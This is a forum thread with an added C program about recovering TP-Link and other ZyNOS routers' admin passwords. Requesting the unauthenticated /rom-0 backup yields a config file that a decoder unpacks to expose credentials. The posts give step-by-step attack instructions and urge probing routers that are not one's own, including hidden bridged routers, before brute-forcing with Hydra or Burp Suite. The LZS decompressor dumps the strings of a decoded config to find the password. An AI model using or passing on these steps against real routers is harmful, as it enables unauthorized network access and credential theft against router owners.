How to Retrieve TP-Link Router Password Instantly and Remotely



mmusket33
2014-09-29, 17:56
To access the password, first download the router's backup configuration file.

Associate with the router with wired or wireless access, open up your favorite web browser and enter:

http://192.168.1.1/rom-0

in the address block and wait

You will get a download/save menu; save the file. You now have an encrypted rom-0 router configuration file. In Kali Linux the file will be in the /root/downloads folder. For purposes here we moved all files referenced to root.

Now go to the following address and download a rom-0 decoder:

http://piotrbania.com/all/utils/RomDecoder.c

This program is in C++. You must first compile it.

Open a terminal window. With your program in root, type:

gcc -o Decoder RomDecoder.c

gcc will write an executable file called Decoder from the RomDecoder.c file you just downloaded.

Now to get your password: point the Decoder program at the router configuration file.

./Decoder rom-0

Voilà. You may see your password below.

There is nothing original here. MTeams just carried the work outlined in nirsoft.net down the next logical step.

Further reading and sources:

http://www.nirsoft.net/utils/router_password_recovery.html

http://piotrbania.com/all/articles/tplink_patch/

MTeams
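Added example, not code from the thread or from the RomDecoder.c linked above: the rom-0 backup that the post calls "encrypted" is LZS-compressed, and undoing that compression is what the linked decoder does. The C program below is a minimal LZS (ANSI X3.241 / RFC 1967) decompressor of the same kind, plus a small greedy compressor used only to build test input, a hand-encoded test vector, and a main() that packs a constructed stand-in for a decoded config and then dumps its NUL-separated strings the way you would hunt for the admin password. It assumes you have already cut the LZS payload out of the rom-0 file; where that payload starts is firmware-specific and not handled here. The config bytes, the password string and all function names are constructed for this example.

```c
/* Added example (not code from the thread or the linked RomDecoder.c): a minimal LZS (ANSI X3.241,
 * RFC 1967) decompressor, the packing ZyNOS-based routers use for the rom-0 config backup.
 * Assumption: the LZS payload has already been cut out of rom-0 (its offset is firmware-specific). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct { const uint8_t *buf; size_t len; size_t pos; } bitreader;   /* pos counts bits */
typedef struct { uint8_t *buf; size_t cap; size_t pos; } bitwriter;

static int get_bits(bitreader *r, int n, unsigned *val) {                 /* MSB-first; -1 if truncated */
    for (*val = 0; n-- > 0; r->pos++) {
        if ((r->pos >> 3) >= r->len) return -1;
        *val = (*val << 1) | ((r->buf[r->pos >> 3] >> (7 - (r->pos & 7))) & 1);
    }
    return 0;
}

/* Tokens: 0 + 8 bits = literal; 1, then 1 + 7-bit or 0 + 11-bit back-offset, then a length code
 * 00=2 01=3 10=4 1100=5 1101=6 1110=7 1111 nnnn=8+n (nnnn=1111 adds 15 and reads another nibble).
 * A 7-bit offset of 0 is the end marker. Returns bytes written, or -1 on malformed input. */
long lzs_decompress(const uint8_t *in, size_t in_len, uint8_t *out, size_t out_cap) {
    bitreader r = { in, in_len, 0 };
    size_t n = 0;
    for (;;) {
        unsigned flag, short_off, off, code, len = 0;
        if (get_bits(&r, 1, &flag)) return -1;
        if (flag == 0) {                                                   /* literal byte */
            if (get_bits(&r, 8, &code) || n >= out_cap) return -1;
            out[n++] = (uint8_t)code; continue;
        }
        if (get_bits(&r, 1, &short_off) || get_bits(&r, short_off ? 7 : 11, &off)) return -1;
        if (off == 0) return short_off ? (long)n : -1;                    /* end marker */
        if (off > n) return -1;                                            /* reaches before output start */
        if (get_bits(&r, 2, &code)) return -1;
        if (code < 3) len = code + 2;
        else if (get_bits(&r, 2, &code)) return -1;
        else if (code < 3) len = code + 5;
        else for (len = 8;; len += 15) {                                   /* 1111 prefix already consumed */
            if (get_bits(&r, 4, &code)) return -1;
            if (code < 15) { len += code; break; }
        }
        if (n + len > out_cap) return -1;                                  /* caller's buffer too small */
        for (unsigned i = 0; i < len; i++, n++) out[n] = out[n - off];     /* byte-wise: overlap is legal */
    }
}

static void put_bits(bitwriter *w, unsigned v, int n) {                    /* MSB-first; buf pre-zeroed */
    for (int i = n - 1; i >= 0; i--, w->pos++)
        if ((w->pos >> 3) < w->cap && ((v >> i) & 1)) w->buf[w->pos >> 3] |= (uint8_t)(0x80 >> (w->pos & 7));
}

/* Greedy LZS compressor (2047-byte window, matches up to 100 bytes); only here to build test
 * input for the decompressor. Returns the output size, or 0 if out_cap is too small. */
size_t lzs_compress(const uint8_t *in, size_t in_len, uint8_t *out, size_t out_cap) {
    bitwriter w = { out, out_cap, 0 };
    memset(out, 0, out_cap);
    for (size_t i = 0; i < in_len;) {
        size_t len = 0, off = 0, max_off = i < 2047 ? i : 2047;
        for (size_t o = 1; o <= max_off; o++) {                            /* longest match in the window */
            size_t l = 0; while (l < 100 && i + l < in_len && in[i + l] == in[i + l - o]) l++;
            if (l > len) { len = l; off = o; }
        }
        if (len < 2) { put_bits(&w, 0, 1); put_bits(&w, in[i++], 8); continue; }
        put_bits(&w, 1, 1); put_bits(&w, off < 128, 1);
        put_bits(&w, (unsigned)off, off < 128 ? 7 : 11);
        i += len;                                                          /* len is only encoded below */
        if (len < 5) put_bits(&w, (unsigned)len - 2, 2);
        else if (len < 8) put_bits(&w, 0xC | ((unsigned)len - 5), 4);
        else {
            put_bits(&w, 0xF, 4);
            for (len -= 8; len >= 15; len -= 15) put_bits(&w, 0xF, 4);
            put_bits(&w, (unsigned)len, 4);
        }
    }
    put_bits(&w, 0x180, 9);                                                /* end marker 1 1 0000000 */
    return (w.pos + 7) / 8 <= out_cap ? (w.pos + 7) / 8 : 0;
}

/* Hand-encoded vector: literals 'a','b','c', then (offset 3, length 6), then the end marker. */
int lzs_known_vector_ok(void) {
    static const uint8_t packed[] = { 0x30, 0x98, 0x8C, 0x78, 0x3D, 0xC0, 0x00 };
    uint8_t out[16];
    return lzs_decompress(packed, sizeof packed, out, sizeof out) == 9 && memcmp(out, "abcabcabc", 9) == 0;
}

/* 1 if data survives compress -> decompress unchanged (buffers sized for small test inputs). */
int lzs_roundtrip_ok(const uint8_t *data, size_t len) {
    uint8_t packed[4096], out[4096];
    size_t plen = len <= sizeof out ? lzs_compress(data, len, packed, sizeof packed) : 0;
    return plen && lzs_decompress(packed, plen, out, sizeof out) == (long)len && memcmp(out, data, len) == 0;
}

int main(void) {
    /* Constructed stand-in for a decoded config (a real rom-0 payload is binary; you dump its strings). */
    static const uint8_t config[] = "admin\0s3cretWiFiPass\0admin\0s3cretWiFiPass\0";
    uint8_t packed[256], out[256];
    size_t plen = lzs_compress(config, sizeof config, packed, sizeof packed);
    long ulen = lzs_decompress(packed, plen, out, sizeof out - 1);
    if (ulen < 0) { fputs("decode failed\n", stderr); return 1; }
    out[ulen] = 0;
    printf("%zu packed -> %ld bytes\n", plen, ulen);
    for (long i = 0; i < ulen; i += (long)strlen((char *)out + i) + 1)    /* NUL-separated strings */
        if (out[i]) printf("  %s\n", (char *)out + i);
    return 0;
}
```

Compile with gcc -o lzs lzs.c and run it. Against a real rom-0 you still have to find where the compressed section starts; a practical check is that lzs_decompress returns a non-negative length and the output contains readable strings, since a stream started at the wrong offset usually trips the "reaches before output start" or buffer-size checks and returns -1 instead of silently producing garbage.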

mmusket33
2014-10-01, 03:31
We have seen cases where D-Link routers providing the wifi access are bridged through LAN to a TP-Link router in the background. When 192.168.1.1/rom-0 is entered the TP-Link router immediately appeared and gave up its rom-0 configuration file, then stayed active on the screen allowing for keyboard input.
Lesson here: test the router even if it is not TP-Link; you never know what is hiding behind the secret door.

MusketTeams

mmusket33
2015-01-10, 00:14
MTeams has found this backdoor embedded in other vendor firmware, so this is NOT specific to TP-Link. The test is simple: just run the IP address of the router and append it with /rom-0. Note: 0 = zero. For example, the router is on 192.168.2.1, so just type 192.168.2.1/rom-0. The file will immediately appear for download.

Furthermore, look for a non-broadcasting router behind and linked to the router broadcasting. If you see the router is broadcasting on 192.168.2.1 and the default gateway is 192.168.1.1, it is a good bet there is another router existing. In this case try 192.168.1.1/rom-0 and see what you get.

MTeams

mmusket33
2016-02-04, 10:18
MTeams continues to find this flaw embedded in firmware written by ISPs who write their own router firmware.

So before you try using Hydra or Burp Suite, save yourself some time and test the router for this flaw.

MTeams